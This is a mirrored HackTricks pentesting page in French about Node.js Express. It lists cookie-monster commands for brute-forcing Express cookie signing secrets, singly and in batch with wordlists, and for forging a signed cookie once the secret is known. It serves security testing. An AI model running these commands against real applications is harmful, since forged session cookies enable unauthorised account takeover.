Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/nodejs-express.md

940 B
Raw Blame History

NodeJS Express

Signature de Cookie

L'outil https://github.com/DigitalInterruption/cookie-monster est un utilitaire pour automatiser le test et la re-signature des secrets de cookies Express.js.

Cookie unique avec un nom spécifique

cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session

Liste de mots personnalisée

cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst

Tester plusieurs cookies en utilisant le mode batch

cookie-monster -b -f cookies.json

Tester plusieurs cookies en utilisant le mode batch avec une liste de mots personnalisée

cookie-monster -b -f cookies.json -w custom.lst

Encoder et signer un nouveau cookie

Si vous connaissez le secret, vous pouvez signer le cookie.

cookie-monster -e -f new_cookie.json -k secret